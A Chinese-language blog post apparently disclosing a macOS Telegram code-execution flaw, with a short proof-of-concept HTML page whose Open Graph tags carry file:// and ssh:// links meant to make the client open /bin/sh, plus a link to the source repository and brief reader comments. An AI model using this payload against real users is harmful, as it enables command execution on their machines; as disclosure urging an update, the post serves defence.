Telegram(macOS v4.9.155353) 代码执行漏洞 PoC

2019-12-9 / 4 评论 业界新闻 / Mrxn

本文共计 555 字,感谢您的耐心浏览与评论.

Telegram 是啥不多说:看到了的赶紧更新吧。
详情看GitHub:https://github.com/Metnew/telegram-links-nsworkspace-open
给你发送一个超链接,包含恶意嵌套代码标签,导致命令执行。
POC 如下:
<html>

</head>
	<!--<meta property="og:url"   content="%A0file://google.com/bin/sh" /> Keybase-->
	<meta property="og:url"   content="file://google.com/bin/sh" />
	<meta property="og:type"  content="article" />
	<meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x" />
	<meta property="og:description" content="ssh://google.com/x file://google.com/bin/sh? " />
</head>

</html>

标签: 漏洞

转载:转载请注明原文链接 - Telegram(macOS v4.9.155353) 代码执行漏洞 PoC


4条回应:“Telegram(macOS v4.9.155353) 代码执行漏洞 PoC”

  1. 文章不错支持一下吧

  2. 文章不错非常喜欢

  3. 网站内容还是挺不错的,谢谢博主。还有博客应该是WORDPRESS做的吧,感觉美观度还可以提高,谢谢。我自已是搞前端设计的,你的代码可以做精简一点。


发表评论

{view_code_no}